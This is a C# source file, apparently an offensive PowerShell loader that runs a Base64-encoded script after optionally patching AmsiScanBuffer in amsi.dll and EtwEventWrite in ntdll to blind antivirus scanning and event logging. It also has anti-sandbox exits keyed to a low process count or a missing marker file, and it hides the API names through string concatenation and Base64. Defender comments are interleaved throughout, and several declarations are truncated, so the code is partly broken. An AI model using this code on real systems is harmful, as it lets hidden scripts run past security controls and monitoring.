using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Collections.ObjectModel;
using System.Runtime.InteropServices;
using System.Text;
using System.Collections.Generic;
namespace MyPowershell
{
class Program
{
    // P/Invoke: kernel32!GetProcAddress — resolves the address of an exported function (or variable)
    // in an already-loaded module.
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    // P/Invoke: kernel32!LoadLibrary — loads the named DLL into this process and returns its module handle.
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    // P/Invoke: kernel32!VirtualProtect — changes the page protection of a region of memory.
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    // Copies the first 6 bytes of Patch to the unmanaged address Address.
    // The length is hard-coded to 6, independent of Patch.Length.
    private static void copy(Byte[] Patch, IntPtr Address)
    {
        Marshal.Copy(Patch, 0, Address, 6);
    }

    // Overwrites the beginning of AmsiScanBuffer in the loaded amsi.dll; the original comment
    // describes this as bypassing AMSI scanning for this process.
    // Defender's note: this is the well-known in-memory AMSI patch. The observable pattern is a
    // VirtualProtect call setting PAGE_EXECUTE_READWRITE (0x40) on part of amsi.dll's code section
    // followed by a write into an exported function; export-integrity checks on amsi.dll and
    // telemetry on protection changes to image pages are the usual detections. The concatenated
    // strings keep the module/export names out of the binary's plain strings, so signatures should
    // key on the API-call pattern rather than on those literals.
    public static void chaching()
    {
        // Load amsi.dll (name assembled at run time).
        IntPtr Library = LoadLibrary("a" + "m" + "s" + "i" + ".dll");
        // Resolve the export to be patched.
        IntPtr Address = GetProcAddress(Library, "Amsi" + "Scan" + "Buffer");
        uint p;
        // Make the target bytes writable and executable; the return value is ignored.
        VirtualProtect(Address, (UIntPtr)5, 0x40, out p);
        // Replacement bytes: B8 57 00 07 80 = mov eax, 0x80070057 (E_INVALIDARG); C3 = ret.
        Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
        // Write the replacement over the function entry.
        copy(Patch, Address);
        Console.WriteLine("Patch Applied");
    }

    // Entry point. Expects a Base64-encoded PowerShell script as the first remaining argument,
    // optionally preceded by "-s" to run chaching() first; prints the script output and waits for a key.
    static void Main(String[] args)
    {
        // No arguments: exit with status 1.
        if (args.Length == 0)
            Environment.Exit(1);
        // Exit when fewer than 40 processes are running; the original comment describes this as a
        // check against Defender's sandbox.
        // Defender's note: a low process count is a common sandbox heuristic; dynamic-analysis
        // environments should present a realistic process population so such gates do not trigger.
        if (Process.GetProcesses().Length < 40)
        {
            Console.WriteLine("The number of processes in the system is less than 40. Exiting the program.");
            Environment.Exit(0);
        }
        // NOTE(review): the generic argument of this declaration was lost in extraction; from the
        // uses below it is presumably a List<string> named argsList built from args — confirm.
        List
        // "-s" switches on the AMSI patch before the script runs.
        if (argsList.Contains("-s"))
        {
            chaching();
            argsList.Remove("-s"); // drop the flag so argsList[0] is the script
        }
        // Decode the Base64 payload into script text.
        string temp = Base64Decode(argsList[0]);
        // Run the script and echo the collected output.
        string s = RunScript(temp);
        Console.WriteLine(s);
        Console.ReadKey();
    }

    // Decodes a Base64 string with Encoding.Default (the system ANSI code page on .NET Framework,
    // UTF-8 on .NET Core/5+), so non-ASCII script text may decode differently across runtimes.
    public static string Base64Decode(string s)
    {
        return System.Text.Encoding.Default.GetString(System.Convert.FromBase64String(s));
    }

    // Runs the given PowerShell script in a fresh runspace, pipes the result through Out-String,
    // and returns the output objects joined one per line.
    // Defender's note: the hosted System.Management.Automation engine is still subject to
    // Script Block Logging (Event ID 4104) and AMSI when those are enabled, which is why the
    // Main path patches AMSI before calling this.
    private static string RunScript(string script)
    {
        // Create and open a runspace to host the pipeline.
        Runspace MyRunspace = RunspaceFactory.CreateRunspace();
        MyRunspace.Open();
        // A pipeline holds the commands to execute.
        Pipeline MyPipeline = MyRunspace.CreatePipeline();
        // The script itself ...
        MyPipeline.Commands.AddScript(script);
        // ... followed by Out-String so the result comes back as text.
        MyPipeline.Commands.Add("Out-String");
        // NOTE(review): generic argument lost in extraction; presumably
        // Collection<PSObject> outputs = MyPipeline.Invoke(); — confirm against the original.
        Collection
        // Close() is not in a finally, so an exception from the invoke skips it.
        MyRunspace.Close();
        // Concatenate each output object, one per line.
        StringBuilder sb = new StringBuilder();
        foreach (PSObject pobject in outputs)
        {
            sb.AppendLine(pobject.ToString());
        }
        return sb.ToString();
    }
}
}
//------------------------------------
// Stand-alone copy of the process-count gate used in Main: exit when fewer than 40 processes are
// running (the original comment describes this as an anti-sandbox check against Defender).
// Defender's note: a low process count is a classic sandbox heuristic; analysis environments
// should present a realistic process population.
if (Process.GetProcesses().Length < 40)
{
    Console.WriteLine("The number of processes in the system is less than 40. Exiting the program.");
    Environment.Exit(0);
}
//------------------------------------public static void chaching()
// NOTE(review): the separator above swallowed the method signature during extraction; the body
// below is a second version of chaching() that adds zero-handle checks and stores the module and
// export names as Base64 instead of concatenated fragments.
// Defender's note: the Base64 literals keep "amsi.dll" / "AmsiScanBuffer" out of the binary's
// plain strings, but the behavioural indicators are unchanged — a protection change to
// PAGE_EXECUTE_READWRITE (0x40) on amsi.dll's image followed by a write into an exported function.
{
    // Library name, stored as Base64 and decoded at run time.
    string base64Encoded = "YW1zaS5kbGw="; // Base64 of the library name (the original note said "ntdll.dll"; this decodes to "amsi.dll")
    string libraryName = Encoding.UTF8.GetString(Convert.FromBase64String(base64Encoded));
    IntPtr Library = LoadLibrary(libraryName);
    if (Library == IntPtr.Zero)
    {
        Console.WriteLine("Failed to load library.");
        return;
    }
    // Export name, also Base64-encoded ("QW1zaVNjYW5CdWZmZXI=" decodes to "AmsiScanBuffer").
    string base64Encoded1 = "QW1zaVNjYW5CdWZmZXI=";
    string functionName = Encoding.UTF8.GetString(Convert.FromBase64String(base64Encoded1));
    Console.WriteLine(functionName);
    IntPtr Address = GetProcAddress(Library, functionName);
    if (Address == IntPtr.Zero)
    {
        Console.WriteLine("Failed to get function address.");
        return;
    }
    uint p;
    // Make the target bytes writable and executable; the return value is ignored.
    VirtualProtect(Address, (UIntPtr)5, 0x40, out p);
    // Replacement bytes: B8 57 00 07 80 = mov eax, 0x80070057 (E_INVALIDARG); C3 = ret.
    Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
    // Write the replacement over the function entry.
    copy(Patch, Address);
    Console.WriteLine("Patch Applied");
}
//------------------------------------
// Overwrites the first byte of ntdll!EtwEventWrite with RET (0xC3), so user-mode ETW events
// emitted by this process return immediately instead of reaching the kernel.
// Defender's note: patching EtwEventWrite blinds in-process ETW telemetry (e.g. .NET runtime and
// PowerShell providers). Export-integrity checks on ntdll and monitoring of protection changes on
// ntdll's image pages are the usual counters. Any exception is caught and printed; the
// LoadLibrary/GetProcAddress results and the VirtualProtect result are not acted on.
public static void etw()
{
    try
    {
        // Module and export names are assembled at run time so they do not appear as plain strings.
        IntPtr Library = LoadLibrary("n" + "t" + "d" + "l" + "l" + ".dll");
        IntPtr Address = GetProcAddress(Library, "Etw" + "Event" + "Write");
        uint oldProtect;
        // Make the first byte writable and executable (PAGE_EXECUTE_READWRITE); result stored but unused.
        bool protectResult = VirtualProtect(Address, (UIntPtr)1, 0x40, out oldProtect);
        Byte[] Patch = { 0xC3 }; // RET instruction
        Marshal.Copy(Patch, 0, Address, Patch.Length);
        Console.WriteLine("ETW Patch Applied");
    }
    catch (Exception ex)
    {
        Console.WriteLine("Exception occurred: " + ex.Message);
    }
}
//------------------------------------
// Second version of RunScript: runs the script through a PowerShell instance created with
// PowerShell.Create() (disposed by the using block) and returns the non-null output objects'
// BaseObject strings, one per line.
// Defender's note: as with the runspace-based version, the hosted engine is still subject to
// Script Block Logging (Event ID 4104) and AMSI when those are enabled.
public static string RunScript(string script)
{
    using (PowerShell powerShellInstance = PowerShell.Create())
    {
        // Queue the script text for execution.
        powerShellInstance.AddScript(script);
        // NOTE(review): generic argument lost in extraction; presumably
        // Collection<PSObject> psOutput = powerShellInstance.Invoke(); — confirm against the original.
        Collection
        StringBuilder stringBuilder = new StringBuilder();
        foreach (PSObject outputItem in psOutput)
        {
            // Skip null entries; append the underlying object's string form.
            if (outputItem != null)
            {
                stringBuilder.AppendLine(outputItem.BaseObject.ToString());
            }
        }
        return stringBuilder.ToString();
    }
}
//------------------------------------// Exit unless a file named 1.txt exists in the current directory.
// Defender's note: a marker-file gate like this is a common anti-analysis technique; a sandbox that
// does not present the expected file only observes an immediate, silent exit.
if (!File.Exists(Path.Combine(Directory.GetCurrentDirectory(), "1.txt")))
{
    Environment.Exit(0);
}
//------------------------------------
-s 绕过amsi
-t 绕过etw